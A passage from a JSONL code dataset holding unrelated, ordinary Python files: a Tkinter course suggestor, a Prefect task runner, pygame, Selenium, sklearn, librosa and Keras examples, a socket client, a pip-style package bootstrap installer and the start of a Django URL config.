m\nimport CourseDictionary\nimport tkMessageBox\nimport CourseSuggestor\n\nfrom Tkinter import *\nfrom ttk import Frame, Label, Entry, Button\n\nclass Example(Frame):\n '''\n Function to initialise GUI\n '''\n def __init__(self, parent):\n Frame.__init__(self, parent)\n self.parent = parent\n self.initUI()\n self.tableHeaders = [\"Si No.\",\"Course Name\",\"Course Description\"]\n\n '''\n Function to build GUI with requiredd elements\n '''\n def initUI(self):\n self.parent.title(\"Course Suggestor\")\n self.pack(fill=BOTH, expand=1)\n self.parent.grid_rowconfigure(0, weight=3)\n self.grid_columnconfigure(0, weight=1, minsize=25)\n\n self.frameInterests = Frame(self)\n self.frameInterests.pack(fill=X)\n\n self.lblInterests = Label(self.frameInterests, text=\"Enter your Interests\", width=20)\n self.lblInterests.pack(side=LEFT, padx=15, pady=15)\n\n self.entryInterests = Entry(self.frameInterests)\n self.entryInterests.pack(fill=X, padx=5, pady=5 , expand=True)\n\n self.frameCourses = Frame(self)\n self.frameCourses.pack(fill=X)\n\n self.lblInterests = Label(self.frameCourses, text=\"Select Your Department\")\n self.lblInterests.pack(side=LEFT, padx=5, pady=5)\n\n\n self.courses = CourseDictionary.coursesOffered.keys()\n\n self.lb = Listbox(self,width=135, height=20, selectmode=\"multiple\")#, yscrollcommand=self.scrollBar.set)\n for i in self.courses:\n self.lb.insert(END, i)\n\n self.lb.bind(\"<>\", self.onSelect)\n self.lb.pack()#pady=15)\n\n self.frameGo = Frame(self)\n self.frameGo.pack(fill=X)\n\n self.goButton = Button(self.frameGo, text=\"Go\", command=self.onGo)\n self.goButton.pack (fill=X, padx=3, pady=3 )\n\n '''\n Function to name the columns in the Tree View\n '''\n def _build_tree(self):\n for col in [\"Si No.\",\"Course Name\",\"Course Description\"]:\n self.tree.heading(col, text=col.title(),command=lambda c=col: sortby(self.tree, c, 0))\n col=\"Course Description\"\n\n '''\n Function to display results in the Tree View\n '''\n def showResults(self):\n self.tree = ttk.Treeview(self,columns=[\"Si No.\",\"Course Name\",\"Course Description\"], show=\"headings\",selectmode=\"none\")\n self.tree.pack(fill=BOTH,expand=YES)\n self._build_tree()\n\n self.var = StringVar()\n self.label = Label(self, text=0, textvariable=self.var)\n self.label.pack()\n\n '''\n Call back Function to perform an action when the user selects a concentration\n '''\n def onSelect(self, val):\n pass\n\n '''\n Call back function on clicking GO button\n '''\n def onGo(self):\n self.showResults()\n if len(self.entryInterests.get())<4:\n self.messageBox = tkMessageBox.showerror(\"Error!\" , \"Enter a keyword (len > 3) of interest!\")\n else:\n if len(self.lb.curselection()) > 0:\n courseSel=[]\n for x in self.lb.curselection():\n courseSel.append (CourseDictionary.coursesOffered[self.courses[x]])\n self.suggestCourses(m.prepareFile(courseSel), self.entryInterests.get())\n else:\n self.messageBox = tkMessageBox.showerror(\"Error!\" , \"Select at least one course!\")\n\n '''\n Functions to get suggestions based on user input\n '''\n def suggestCourses(self,fileToRead, interestData):\n courseDesc,courseName = CourseSuggestor.readCSV(fileToRead )\n queryIndex=len(courseDesc)\n numberOfPreictions=10\n courseDesc.append(interestData)\n suggestions = CourseSuggestor.suggestCourses(courseDesc,20)\n i=0\n suggestionsMax = numberOfPreictions\n if len(suggestions) < numberOfPreictions:\n print (\"Couldn't find many courses with the provided Description. Here is the list of all suggestions\")\n suggestionsMax = len(suggestions)\n tableHeaders = [\"Si No.\",\"Course Name\",\"Course Description\"]\n for index, score in suggestions[:suggestionsMax+1]:\n if not (index >= len(courseName)-1 ):\n self.tree.insert('','end',values=[i+1,courseName[index],courseDesc[index]])\n i+=1\n os.remove(fileToRead)\n\n '''\n FUnction that alignns the GUI in the center of the screen\n '''\n def centerWindow(self):\n\n w = 990\n h = 1390\n\n sw = self.parent.winfo_screenwidth()\n sh = self.parent.winfo_screenheight()\n\n x = (sw - w)/2\n y = (sh - h)/2\n self.parent.geometry('%dx%d+%d+%d' % (w, h, x, y))\n\n'''\n Main function to start and run the program\n'''\ndef main():\n root = Tk()\n ex = Example(root)\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/Gui.py","file_name":"Gui.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"647572807","text":"#!/usr/local/bin python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n给出一个 32 位的有符号整数,你需要将这个整数中每位上的数字进行反转。\n\"\"\"\n\n\nclass Solution:\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n str_x = str(x)\n result = [str_x[0]] if str_x[0] == '-' else []\n for idx in range(len(str_x)-1, -1, -1):\n if idx == 0 and str_x[idx] == '-':\n continue\n result.append(str_x[idx])\n result = int(''.join(result))\n return result if -(2**31) <= result <= 2**31-1 else 0\n\n\nif __name__ == \"__main__\":\n result = Solution().reverse(x=120)\n print(result)\n","sub_path":"reverse/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"481800006","text":"import copy\nimport warnings\nfrom typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union\n\nimport prefect\nfrom prefect.client import Client\nfrom prefect.core import Edge, Task\nfrom prefect.engine.cloud.utilities import prepare_state_for_cloud\nfrom prefect.engine.result import NoResult\nfrom prefect.engine.result_handlers import ResultHandler\nfrom prefect.engine.runner import ENDRUN, call_state_handlers\nfrom prefect.engine.state import Cached, Failed, Mapped, State\nfrom prefect.engine.task_runner import TaskRunner, TaskRunnerInitializeResult\nfrom prefect.utilities.graphql import with_args\n\n\nclass CloudTaskRunner(TaskRunner):\n \"\"\"\n TaskRunners handle the execution of Tasks and determine the State of a Task\n before, during and after the Task is run.\n\n In particular, through the TaskRunner you can specify the states of any upstream dependencies,\n and what state the Task should be initialized with.\n\n Args:\n - task (Task): the Task to be run / executed\n - state_handlers (Iterable[Callable], optional): A list of state change handlers\n that will be called whenever the task changes state, providing an\n opportunity to inspect or modify the new state. The handler\n will be passed the task runner instance, the old (prior) state, and the new\n (current) state, with the following signature: `state_handler(TaskRunner, old_state, new_state) -> State`;\n If multiple functions are passed, then the `new_state` argument will be the\n result of the previous handler.\n - result_handler (ResultHandler, optional): the handler to use for\n retrieving and storing state results during execution (if the Task doesn't already have one);\n if not provided here or by the Task, will default to the one specified in your config\n \"\"\"\n\n def __init__(\n self,\n task: Task,\n state_handlers: Iterable[Callable] = None,\n result_handler: ResultHandler = None,\n ) -> None:\n self.client = Client()\n super().__init__(\n task=task, state_handlers=state_handlers, result_handler=result_handler\n )\n\n def _heartbeat(self) -> None:\n try:\n task_run_id = self.task_run_id # type: ignore\n self.client.update_task_run_heartbeat(task_run_id) # type: ignore\n except:\n warnings.warn(\"Heartbeat failed for Task '{}'\".format(self.task.name))\n\n def call_runner_target_handlers(self, old_state: State, new_state: State) -> State:\n \"\"\"\n A special state handler that the TaskRunner uses to call its task's state handlers.\n This method is called as part of the base Runner's `handle_state_change()` method.\n\n Args:\n - old_state (State): the old (previous) state\n - new_state (State): the new (current) state\n\n Returns:\n - State: the new state\n \"\"\"\n raise_on_exception = prefect.context.get(\"raise_on_exception\", False)\n\n try:\n new_state = super().call_runner_target_handlers(\n old_state=old_state, new_state=new_state\n )\n except Exception as exc:\n msg = \"Exception raised while calling state handlers: {}\".format(repr(exc))\n self.logger.debug(msg)\n if raise_on_exception:\n raise exc\n new_state = Failed(msg, result=exc)\n\n task_run_id = prefect.context.get(\"task_run_id\")\n version = prefect.context.get(\"task_run_version\")\n\n try:\n cloud_state = prepare_state_for_cloud(new_state)\n self.client.set_task_run_state(\n task_run_id=task_run_id,\n version=version,\n state=cloud_state,\n cache_for=self.task.cache_for,\n )\n except Exception as exc:\n self.logger.debug(\n \"Failed to set task state with error: {}\".format(repr(exc))\n )\n raise ENDRUN(state=new_state)\n\n if version is not None:\n prefect.context.update(task_run_version=version + 1) # type: ignore\n\n return new_state\n\n def initialize_run( # type: ignore\n self, state: Optional[State], context: Dict[str, Any]\n ) -> TaskRunnerInitializeResult:\n \"\"\"\n Initializes the Task run by initializing state and context appropriately.\n\n Args:\n - state (Optional[State]): the initial state of the run\n - context (Dict[str, Any]): the context to be updated with relevant information\n\n Returns:\n - tuple: a tuple of the updated state, context, and upstream_states objects\n \"\"\"\n\n # if the map_index is not None, this is a dynamic task and we need to load\n # task run info for it\n map_index = context.get(\"map_index\")\n if map_index not in [-1, None]:\n try:\n task_run_info = self.client.get_task_run_info(\n flow_run_id=context.get(\"flow_run_id\", \"\"),\n task_id=self.task.id,\n map_index=map_index,\n )\n\n # if state was provided, keep it; otherwise use the one from db\n state = state or task_run_info.state # type: ignore\n context.update(\n task_run_version=task_run_info.version, # type: ignore\n task_run_id=task_run_info.id, # type: ignore\n )\n except Exception as exc:\n self.logger.debug(\n \"Failed to retrieve task state with error: {}\".format(repr(exc))\n )\n if state is None:\n state = Failed(\n message=\"Could not retrieve state from Prefect Cloud\",\n result=exc,\n )\n raise ENDRUN(state=state)\n\n # we assign this so it can be shared with heartbeat thread\n self.task_run_id = context.get(\"task_run_id\") # type: ignore\n context.update(cloud=True)\n\n return super().initialize_run(state=state, context=context)\n","sub_path":"src/prefect/engine/cloud/task_runner.py","file_name":"task_runner.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"69324364","text":"import socket\n\ns = socket.socket()\n\n\ndef getserver():\n try:\n host = input('What is the IP of the host?\\n>>')\n port = 12345\n s.connect((host, port))\n except:\n print('Couldn\\'t connect, try again')\n getserver()\n\n\ngetserver()\n\n\nclient = True\nwhile client:\n svstr = input('Input> ')\n if not svstr:\n continue\n svbyte = svstr.encode('utf-8')\n try:\n s.send(svbyte)\n except:\n print('Connection lost, exiting...')\n break\n r = s.recv(1024).decode('utf-8')\n if r == 'exit':\n break\n else:\n print(r)\ns.close()\n\n","sub_path":"client_cmd.py","file_name":"client_cmd.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"426852686","text":"#-*- coding:utf-8 -*-\r\n#test_map.py\r\n\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\n\r\ns_width = 600\r\ns_height = 600\r\nclock = pygame.time.Clock()\r\nfps = 30\r\nrunning = True\r\n\r\ngame_screen = pygame.display.set_mode((s_width, s_height), pygame.DOUBLEBUF)\r\nbackground = pygame.Surface(game_screen.get_size()) # Criando uma nova Surface\r\n#background = background.convert() # Convertendo os pixels para \"pygame\"\r\nbackground.fill((255,0,0)) # Cor do Background\r\n\r\nclass Player(pygame.sprite.DirtySprite): # Herdando Dirty_Sprites\r\n\r\n def __init__(self):\r\n \r\n pygame.sprite.DirtySprite.__init__(self) # Inicializando a Herança\r\n #self.image = pygame.image.load(\"poo1.png\") # Imagem aleatoria\r\n self.image = pygame.Surface((50,50)) # Criando uma nova Surface\r\n self.rect = self.image.get_rect() # Criando um rect do tamanho da Surface\r\n self.rect = pygame.draw.rect(self.image, (0,255,0), self.rect)\r\n self.speed = 10\r\n # Desenhando um quadrado na tela.\r\n\r\n def update(self):\r\n #self.p_move() #Chamando p_move(), para atualizar o objeto\r\n #print(self.rect)\r\n self.dirty = 1 # Atualiza Sprite\r\n\r\n def p_move(self):\r\n #Atualizado:\r\n #Ao invez de usar update() com argumentos,\r\n #p_move pega o rect.x, rect.y e o movimenta\r\n\r\n key = pygame.key.get_pressed()\r\n if key[pygame.K_LEFT]:\r\n self.rect.x -= self.speed\r\n if key[pygame.K_RIGHT]:\r\n self.rect.x += self.speed\r\n if key[pygame.K_UP]:\r\n self.rect.y -= self.speed\r\n if key[pygame.K_DOWN]:\r\n self.rect.y += self.speed\r\n\r\n #Limitando o Objeto dentro da tela\r\n if self.rect.left < 0:\r\n self.rect.x += self.speed\r\n elif self.rect.right > s_width:\r\n self.rect.x -= self.speed\r\n\r\n if self.rect.top < 0:\r\n self.rect.y += self.speed\r\n elif self.rect.bottom > s_height:\r\n self.rect.y -= self.speed\r\n\r\nplayer = Player()\r\n\r\nallsprites = pygame.sprite.LayeredDirty(player) # Adicionando o Objeto ao \"grupo\"\r\nallsprites.clear(game_screen, background) # Limpando a tela\r\n\r\nwhile(running):\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n\r\n allsprites.update()\r\n player.p_move()\r\n\r\n rects = allsprites.draw(game_screen) # Desenhando os objetos do grupo na tela\r\n pygame.display.update(rects) # Atualizando os objetos do grupo\r\n clock.tick(fps)\r\n #print(clock.get_fps())\r\n\r\npygame.quit()\r\n","sub_path":"Pygame/test_maps/test_map.py","file_name":"test_map.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"597822155","text":"from typing import Union\n\nfrom selenium.common.exceptions import WebDriverException\nfrom utilities.driver_helpers.selectors import Selector\nfrom utilities.exceptions import PageObjectUrlException\n\n\nclass Page(object):\n \"\"\"A page object.\n\n Page objects form the foundation for automation testing by programmatically simulating the\n page being tested.\n\n :usage example:\n from utilities import Page\n\n class Login(Page):\n ROOT_LOCATOR: Selector = Selectors.class_name('login-container')\n URL_PATH: str = '/login'\n\n login_page = Login(selenium)\n login_page.visit()\n assert login_page.loaded is True\n \"\"\"\n\n ROOT_LOCATOR: Selector = None\n URL_PATH: str = None\n\n def __init__(self, driver, base_url=''):\n \"\"\"Initialize the page.\n\n :param driver: An instance of Selenium Web Driver.\n :param base_url: The base url of the application.\n \"\"\"\n self.base_url = base_url\n self.driver = driver\n\n @property\n def loaded(self) -> bool:\n \"\"\"Boolean check for whether the page has loaded successfully.\"\"\"\n if self.ROOT_LOCATOR is None:\n return self.driver.current_url == self.url\n\n try:\n return bool(self.driver.wait_until_visible(*self.ROOT_LOCATOR))\n except WebDriverException:\n return False\n\n @property\n def url(self) -> Union[str, None]:\n \"\"\"Build a URL based on the base url and optional path.\"\"\"\n url = self.base_url\n\n if self.URL_PATH is not None:\n url = f'{self.base_url}{self.URL_PATH}'\n\n if not url:\n return None\n\n return url\n\n def wait_for_page_to_load(self, wait_time=None) -> Union[object, None]:\n \"\"\"Wait for the page to load, then return the page.\n\n :param wait_time: The amount of time until a TimeoutException occurs.\n \"\"\"\n if self.ROOT_LOCATOR is None:\n self.driver.wait_until_url_contains(self.url, wait_time=wait_time)\n else:\n try:\n self.driver.wait_until_visible(*self.ROOT_LOCATOR, wait_time=wait_time)\n except WebDriverException:\n return None\n return self\n\n def visit(self) -> object:\n \"\"\"Open a page via url.\"\"\"\n if self.url:\n self.driver.get(self.url)\n self.wait_for_page_to_load()\n return self\n raise PageObjectUrlException(\n 'A base URL or URL_PATH must be set in order to visit this page.',\n )\n","sub_path":"utilities/page_object_models/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"609937317","text":"from sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\nx = [[80, 86],\n[82, 80],\n[85, 78],\n[90, 90],\n[86, 82],\n[82, 90],\n[78, 80],\n[92, 94]]\ny = [84.2, 80.6, 80.1, 90, 83.2, 87.6, 79.4, 93.4]\n\nscore_data = pd.DataFrame(x, columns=['english', 'math'])\nprint(score_data)\nscore_data['mean_score'] = y\nprint(score_data)\n\n\ndef plot_iris(data, col1, col2):\n sns.lmplot(data=data, x=col1, y=col2, hue=\"mean_score\", fit_reg=True) \n #data:数据值,x,y:具体x轴,y轴的数据索引值,hue:目标值,fit_reg:是否进行线性拟合\n plt.xlabel(col1)\n plt.ylabel(col2)\n plt.title('mean_score data distribute')\n plt.show()\n\nplot_iris(score_data, 'english', 'math')\n\n\n# 实例化API\nestimator = LinearRegression()\n# 使用fit方法进行训练\nestimator.fit(x,y)\n\ncoef = estimator.coef_\nintercept = estimator.intercept_\nprint(coef, intercept)\n\nprint(estimator.predict([[100, 80]]))","sub_path":"7.Regression/1.regression.py","file_name":"1.regression.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"450775111","text":"import librosa\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport numpy as np\nimport streamlit as st\nimport glob\n\n\n@st.cache\ndef get_dir_overview():\n \"\"\"\n Adopt this method for the dataset at hand\n :return:\n \"\"\"\n #find all files\n files = glob.glob(\"dataset/*.wav\")\n\n # build a label->[sample1, sample2, sample3, ...] mapping\n data = {f'{i}': [] for i in range(50)}\n for sample in files:\n label = sample.split(\"-\")[-1].split(\".\")[0]\n data[label].append(sample)\n\n return data\n\n\n@st.cache\ndef load_audio_sample(file_path: str):\n y, sr = librosa.load(file_path, sr=22050)\n\n return y, sr, file_path\n\n\ndef plot_spectrogram(y, sr, file_path):\n pass\n\n\ndef plot_linear_spectrogram(y, sr, file_path):\n plt.close('all')\n D = librosa.stft(y) # STFT of y\n S_db = librosa.amplitude_to_db(np.abs(D), ref=np.max)\n plt.close(\"all\")\n fig, ax = plt.subplots()\n img = librosa.display.specshow(S_db, x_axis='time', y_axis='linear', ax=ax)\n ax.set(title='Linear-scale spectrogram')\n fig.colorbar(img, ax=ax, format=\"%+2.f dB\")\n\n return plt.gcf()\n\n\ndef plot_log_spectrogram(y):\n plt.close(\"all\")\n fig, ax = plt.subplots()\n D = librosa.amplitude_to_db(np.abs(librosa.stft(y)), ref=np.max)\n img = librosa.display.specshow(D, x_axis='time', y_axis='log', ax=ax)\n ax.set(title='Log-scale spectrogram')\n fig.colorbar(img, ax=ax, format=\"%+2.f dB\")\n\n return plt.gcf()\n\n\ndef plot_mel_spectrogram(y, sr):\n plt.close(\"all\")\n fig, ax = plt.subplots()\n M = librosa.feature.melspectrogram(y=y, sr=sr)\n M_db = librosa.power_to_db(M, ref=np.max)\n img = librosa.display.specshow(M_db, y_axis='mel', x_axis='time', ax=ax)\n ax.set(title='Mel-scale spectrograms')\n fig.colorbar(img, ax=ax, format=\"%+2.f dB\")\n\n return plt.gcf()\n\n\ndef plot_mfccs(y):\n plt.close('all')\n fig, ax = plt.subplots()\n mfccs = librosa.feature.mfcc(y=y, n_mfcc=80)\n img = librosa.display.specshow(mfccs, x_axis='time', ax=ax)\n ax.set(title='MFCCs')\n fig.colorbar(img, ax=ax)\n\n return plt.gcf()\n\n\ndef plot_wave(y, sr):\n plt.close('all')\n fig, ax = plt.subplots()\n img = librosa.display.waveplot(y, sr=sr, x_axis='time', ax=ax)\n ax.set(title='Waveplot')\n\n return plt.gcf()\n\n","sub_path":"audio_loading_utils.py","file_name":"audio_loading_utils.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"371837339","text":"\"\"\"Contains common building blocks for yolo neural networks.\"\"\"\nfrom functools import partial\n\nimport tensorflow as tf\nimport tensorflow.keras as ks\nimport tensorflow.keras.backend as K\nfrom ._Identity import Identity\n\nfrom yolo.modeling.functions.mish_activation import mish\n\n\n@ks.utils.register_keras_serializable(package='yolo')\nclass DarkConv(ks.layers.Layer):\n def __init__(\n self,\n filters=1,\n kernel_size=(1, 1),\n strides=(1, 1),\n padding='same',\n dilation_rate=(1, 1),\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n bias_regularizer=None,\n l2_regularization=5e-4, # default find where is it is stated\n use_bn=True,\n use_sync_bn=False,\n norm_moment=0.99,\n norm_epsilon=0.001,\n activation='leaky',\n leaky_alpha=0.1,\n **kwargs):\n '''\n Modified Convolution layer to match that of the DarkNet Library\n\n Args:\n filters: integer for output depth, or the number of features to learn\n kernel_size: integer or tuple for the shape of the weight matrix or kernel to learn\n strides: integer of tuple how much to move the kernel after each kernel use\n padding: string 'valid' or 'same', if same, then pad the image, else do not\n dialtion_rate: tuple to indicate how much to modulate kernel weights and\n the how many pixels ina featur map to skip\n use_bias: boolean to indicate wither to use bias in convolution layer\n kernel_initializer: string to indicate which function to use to initialize weigths\n bias_initializer: string to indicate which function to use to initialize bias\n l2_regularization: float to use as a constant for weight regularization\n use_bn: boolean for wether to use batchnormalization\n use_sync_bn: boolean for wether sync batch normalization statistics\n of all batch norm layers to the models global statistics (across all input batches)\n norm_moment: float for moment to use for batchnorm\n norm_epsilon: float for batchnorm epsilon\n activation: string or None for activation function to use in layer,\n if None activation is replaced by linear\n leaky_alpha: float to use as alpha if activation function is leaky\n **kwargs: Keyword Arguments\n\n '''\n\n # convolution params\n self._filters = filters\n self._kernel_size = kernel_size\n self._strides = strides\n self._padding = padding\n self._dilation_rate = dilation_rate\n self._use_bias = use_bias\n self._kernel_initializer = kernel_initializer\n self._bias_initializer = bias_initializer\n self._l2_regularization = l2_regularization\n self._bias_regularizer = bias_regularizer\n\n # batchnorm params\n self._use_bn = use_bn\n if self._use_bn:\n self._use_bias = False\n self._use_sync_bn = use_sync_bn\n self._norm_moment = norm_moment\n self._norm_epsilon = norm_epsilon\n\n if tf.keras.backend.image_data_format() == 'channels_last':\n # format: (batch_size, height, width, channels)\n self._bn_axis = -1\n else:\n # format: (batch_size, channels, width, height)\n self._bn_axis = 1\n\n # activation params\n if activation is None:\n self._activation = 'linear'\n else:\n self._activation = activation\n self._leaky_alpha = leaky_alpha\n\n super(DarkConv, self).__init__(**kwargs)\n return\n\n def build(self, input_shape):\n kernel_size = self._kernel_size if type(\n self._kernel_size) == int else self._kernel_size[0]\n if self._padding == \"same\" and kernel_size != 1:\n self._zeropad = ks.layers.ZeroPadding2D(\n ((1, 1), (1, 1))) # symetric padding\n else:\n self._zeropad = Identity()\n\n self.conv = ks.layers.Conv2D(\n filters=self._filters,\n kernel_size=self._kernel_size,\n strides=self._strides,\n padding=\"valid\", #self._padding,\n dilation_rate=self._dilation_rate,\n use_bias=self._use_bias,\n kernel_initializer=self._kernel_initializer,\n bias_initializer=self._bias_initializer,\n kernel_regularizer=ks.regularizers.l2(self._l2_regularization),\n bias_regularizer=self._bias_regularizer)\n\n #self.conv =tf.nn.convolution(filters=self._filters, strides=self._strides, padding=self._padding\n if self._use_bn:\n if self._use_sync_bn:\n self.bn = tf.keras.layers.experimental.SyncBatchNormalization(\n momentum=self._norm_moment,\n epsilon=self._norm_epsilon,\n axis=self._bn_axis)\n else:\n self.bn = ks.layers.BatchNormalization(\n momentum=self._norm_moment,\n epsilon=self._norm_epsilon,\n axis=self._bn_axis)\n else:\n self.bn = Identity()\n\n if self._activation == 'leaky':\n alpha = {\"alpha\": self._leaky_alpha}\n self._activation_fn = partial(tf.nn.leaky_relu, **alpha)\n elif self._activation == 'mish':\n self._activation_fn = mish()\n else:\n self._activation_fn = ks.layers.Activation(\n activation=self._activation)\n\n super(DarkConv, self).build(input_shape)\n return\n\n def call(self, inputs):\n x = self._zeropad(inputs)\n x = self.conv(x)\n x = self.bn(x)\n x = self._activation_fn(x)\n return x\n\n def get_config(self):\n # used to store/share parameters to reconsturct the model\n layer_config = {\n \"filters\": self._filters,\n \"kernel_size\": self._kernel_size,\n \"strides\": self._strides,\n \"padding\": self._padding,\n \"dilation_rate\": self._dilation_rate,\n \"use_bias\": self._use_bias,\n \"kernel_initializer\": self._kernel_initializer,\n \"bias_initializer\": self._bias_initializer,\n \"bias_regularizer\": self._bias_regularizer,\n \"l2_regularization\": self._l2_regularization,\n \"use_bn\": self._use_bn,\n \"use_sync_bn\": self._use_sync_bn,\n \"norm_moment\": self._norm_moment,\n \"norm_epsilon\": self._norm_epsilon,\n \"activation\": self._activation,\n \"leaky_alpha\": self._leaky_alpha\n }\n layer_config.update(super(DarkConv, self).get_config())\n return layer_config\n","sub_path":"yolo/modeling/building_blocks/_DarkConv.py","file_name":"_DarkConv.py","file_ext":"py","file_size_in_byte":6867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"317652826","text":"platform_info = {\n 'id' : 'ouba',\n 'location' : 'Outer Banks, NC',\n ##### use bounding box (limits or polygon) to describe location\n 'lat' : (33.5, 38.), # degrees true (-) south, (+) north\n 'lon' : (-76, -73.), # degrees true (-) west, (+) east\n 'mvar' : -11, # degrees (-) west, (+) east\n 'nlat' : 83.,\n 'nlon' : 45.,\n # 'mean_water_depth' : -8.14, # meters (-) down, (+) up\n # 'mean_water_depth_time_period' : 'June 2006 - June 2008',\n 'institution' : 'nccoos',\n # \n 'config_start_date' : '2013-11-01 00:00:00',\n 'config_end_date' : None, # None or yyyy-mm-dd HH:MM:SS\n 'packages' : ('hfr', ),\n }\nsensor_info = {\n 'hfr' : { 'id' : 'hfr',\n 'description' : 'High Frequency RADAR Surface Current Totals',\n 'raw_dir' : '/seacoos/data/nccoos/level0/ouba/hfr_totals',\n 'raw_file_glob' : '*.tuv',\n 'proc_dir' : '/seacoos/data/nccoos/level1/ouba/hfr_totals',\n 'process_module' : 'proc_codar_totals',\n 'utc_offset' : 0, # hours offset to utc\n 'operating_frequency' : 4.5, # MHz\n 'averaging_radius' : 9.0, # kilometers\n # 'plot_module' : 'ouba_totals_plot', \n # 'plot_names' : ('vecmap',), \n # 'csv_dir' : '/seacoos/data/nccoos/latest_csv',\n # 'cvs_vars' : ('time','lat','lon','z','u','v'),\n 'latest_dir' : '/seacoos/data/nccoos/latest_v2.0',\n 'latest_vars' : ('time','lat','lon','z','u','v'),\n },\n }\n \n## NOTE: grid definition for totals based on 6km spacing and the bounding box\n# minlat, maxlat = (33.5, 38.)\n# minlon, maxlon = (-76, -73.)\n# midlat = minlat + 0.5*(maxlat-minlat)\n## ~111 km = 1 deg latitude\n# nlat = numpy.round((maxlat-minlat) *111/6)\n# nlon = numpy.round((maxlon-minlon) * math.cos(midlat*math.pi/180)*111/6)\n# nlat\n# >>> 83\n# nlon\n# >>> 45\n","sub_path":"ouba_config_20131101.py","file_name":"ouba_config_20131101.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"172099979","text":"#! /usr/bin/env python\n\nimport os\nimport sys\nimport urllib\nimport urllib2\nimport tarfile\nimport zipfile\nimport tempfile\nimport subprocess\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\n\nURL = 'http://pypi.python.org/pypi/pyg/json'\n\n\ndef log(msg):\n return sys.stdout.write(msg + '\\n')\n\ndef unpack(path):\n if tarfile.is_tarfile(path):\n archive = tarfile.open(path)\n elif zipfile.is_zipfile(path):\n archive = zipfile.open(path)\n else:\n raise TypeError('Unknown file-type: {0}'.format(path))\n tempdir = tempfile.mkdtemp()\n archive.extractall(tempdir)\n return os.path.join(tempdir, os.listdir(tempdir)[0])\n\ndef get_url():\n data = urllib2.urlopen(URL).read()\n json_data = json.loads(data)\n installable = (release for release in json_data['urls'] if release['packagetype'] == 'sdist')\n return min(installable, key=lambda item: item['size'])['url']\n\ndef install():\n if '--dev' in sys.argv:\n url = 'https://github.com/rubik/pyg/tarball/master'\n else:\n url = get_url()\n log('Retrieving archive from {0}'.format(url))\n path = urllib.urlretrieve(url)[0]\n log('Unpacking archive...')\n path = unpack(path)\n setup_py = os.path.join(path, 'setup.py')\n python = 'python{0}.{1}'.format(*sys.version_info[:2])\n try:\n log('Running setup.py install...')\n subprocess.check_call([python, setup_py, 'install'], cwd=path)\n except subprocess.CalledProcessError as e:\n log('Installation failed. Installation command returned non-zero ' \\\n 'exit status: ' + str(e.returncode) + '\\n')\n\n\nif __name__ == '__main__':\n install()","sub_path":"get-pyg.py","file_name":"get-pyg.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"255705800","text":"\"\"\"QI URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import *\nfrom django.contrib import admin\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom . import views\nfrom django.urls import path,re_path,reverse,include\n\napp_name=\"QI\"\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.Home.as_view(),name='home'),\n path('profiles', views.profiles, name=\"Person Profiles\"),\n path('about', views.about, name=\"About Page\"),\n\tpath('base_explicit/', views.base_explicit, name='base explicit'), \n\tpath('base/', views.base, name='base non explicit'), \n path('cornp1', views.cornp1, name=\"Henry Cornplanter\"),\n path('places', views.places, name=\"Places page\"),\n path('organizations', views.organizations, name=\"Organizations page\"),\n path('manuscripts/', views.manuscripts, name=\"Manuscripts\"),\n re_path(r'^page/(?P\\S+_[0-9]{3})', views.pageinfo, name=\"page\"),\n re_path(r'^pageinfo/(?P\\S+_[0-9]{3})', views.newpageinfo, name=\"pageinfo\"),\n re_path(r'^pagetranscription/(?P\\S+_[0-9]{3})', views.pagetranscription, name=\"pagetranscription\"),\n path('travelRoutes/', views.travelRoutes, name=\"TravelRoutes\"),\n path('travelRoutes/', include('QI.inner')),\n path('overviewmap_traveler', views.overviewmap_traveler, name='traveler'),\n path('overviewmap_date', views.overviewmap_date, name='date'),\n 